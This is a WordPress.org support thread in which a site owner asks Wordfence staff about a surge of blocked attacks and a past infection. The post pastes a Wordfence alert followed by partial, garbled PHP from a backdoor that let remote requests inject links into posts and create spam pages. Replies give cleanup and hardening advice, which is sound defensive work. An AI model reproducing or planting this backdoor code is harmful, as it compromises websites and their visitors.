Title: Attacks Blocked
Last modified: April 5, 2017
---
# Attacks Blocked
* Resolved [sulaardit](https://wordpress.org/support/users/sulaardit/)
* (@sulaardit)
* [9 years ago](https://wordpress.org/support/topic/attacks-blocked/)
* HELLO WORDFENCE
First of all Thank you so much for the service you provide.
* I’ve currently got about 5 websites with WORDFENCE in my portfolio and generally
speaking I get about 1-10 attacks a week blocked.
* Recently I installed WORDFENCE on a new website hsnf.co.uk and I’m amazed to
be seeing around +150 attacks daily.
* Should I be worried about this and are there any steps to be taken to see why
this is the case?
* Also about a week ago, I received an email for my other domain but because I’m
on a shared host all my domains are in one place and actually each domain was
affected with the scripts below. I managed to delete the infected files and restore
them to its original condition.
I’m unaware how that script managed to creep
in. I haven’t seen anything suspicious until now where one of my new domains
is getting 150+ attacks daily.
* Is deleting the files enough? Since its been a week should I safely assume that
the problem won’t return?
* ```
This email was sent from your website "PIPKIN" by the Wordfence plugin.
Wordfence found the following new issues on "PIPKIN".
Alert generated at Saturday 1st of April 2017 at 01:04:25 AM
Critical Problems:
* WordPress core file modified: wp-includes/post.php
* File appears to be malicious: wp-content/themes/twentyfifteen/functions.php
* File appears to be malicious: wp-content/themes/twentyseventeen/functions.php
* File appears to be malicious: wp-content/themes/twentysixteen/functions.php
* File appears to be malicious: wp-content/themes/wr-nitro/functions.php
* File appears to be malicious: wp-content/themes/wr-nitro-child/functions.php
* File appears to be malicious: wp-includes/post.php
Warnings:
* Modified theme file: wp-content/themes/twentyfifteen/functions.php
* Modified theme file: wp-content/themes/twentysixteen/functions.php
* Unknown file in WordPress core: wp-includes/class.wp.php
* Unknown file in WordPress core: wp-includes/wp-cd.phpget_results('SELECT * FROM ' . $wpdb->prefix . 'posts WHERE post_status = "publish" AND post_type = "post" ORDER BY ID DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!
(.*?)
!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}
print '1' . $data['guid'] . '' . $data['code'] . '' . $data['ID'] . '' . "\r\n";
}
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT post_content FROM ' . $wpdb->prefix . 'posts WHERE ID = "'.mysql_escape_string($_REQUEST['id']).'"');
$post_content = preg_replace('!
';
if ($wpdb->query('UPDATE ' . $wpdb->prefix . 'posts SET post_content = "' . mysql_escape_string($post_content) . '" WHERE ID = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;
case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM ' . $wpdb->prefix . 'datalist WHERE url = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO ' . $wpdb->prefix . 'datalist SET url = "/'.mysql_escape_string($_REQUEST['url']).'", title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string($_REQUEST['content']).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
}
die("");
}
if ( $wpdb->get_var('SELECT count(*) FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '';
print '';
print '';
print ''.stripslashes($data -> title).'';
print '';
print '';
print '';
print '';
print '';
print '';
print '';
wp_head();
print '';
print '';
print '
';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}
exit;
}
?>
```
- This topic was modified 9 years ago by [sulaardit](https://wordpress.org/support/users/sulaardit/).
- This topic was modified 9 years ago by [sulaardit](https://wordpress.org/support/users/sulaardit/).
Viewing 2 replies - 1 through 2 (of 2 total)
* [wfalaa](https://wordpress.org/support/users/wfalaa/)
* (@wfalaa)
* [9 years ago](https://wordpress.org/support/topic/attacks-blocked/#post-9001042)
* Hi sulaardit,
You don’t need to worry about the increasing number of attacks
on this site specifically, it can fluctuate depending on many factors, perhaps
your website is hosted on a specific server that was under attack recently, the
most important part is that Wordfence WAF is blocking all these suspicious requests.
* Answering to your question, well, deleting the infected/injected files is a good
start, but sometimes attackers inject a backdoor on your website (this could
be a [malicious plugin](https://wordpress.org/support/topic/code-added-to-functions-file/))
that can recreate these files again and again, so I recommend following steps
mentioned in “[How to Clean a Hacked WordPress Site using Wordfence](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/)“,
and apply these tips regarding “[How to Harden Your WordPress Site From Attacks](https://www.wordfence.com/learn/how-to-harden-wordpress-sites/)”
to prevent similar problems in the future.
* Thanks.
* [wfalaa](https://wordpress.org/support/users/wfalaa/)
* (@wfalaa)
* [8 years, 11 months ago](https://wordpress.org/support/topic/attacks-blocked/#post-9132976)
* Hi [@sulaardit](https://wordpress.org/support/users/sulaardit/)
Since I haven’t
heard back from you I am assuming that the instructions helped you solve your
issue so I am marking this topic as resolved.
* If however, for whatever reason, you are still experiencing this issue and it
is not resolved please respond to the post, which will move it back up the queue,
and mark this topic as “not resolved”.
* Thank you.
Viewing 2 replies - 1 through 2 (of 2 total)
The topic ‘Attacks Blocked’ is closed to new replies.
* 
* [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
* [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
* [Support Threads](https://wordpress.org/support/plugin/wordfence/)
* [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
* [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
* [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)
* 2 replies
* 2 participants
* Last reply from: [wfalaa](https://wordpress.org/support/users/wfalaa/)
* Last activity: [8 years, 11 months ago](https://wordpress.org/support/topic/attacks-blocked/#post-9132976)
* Status: resolved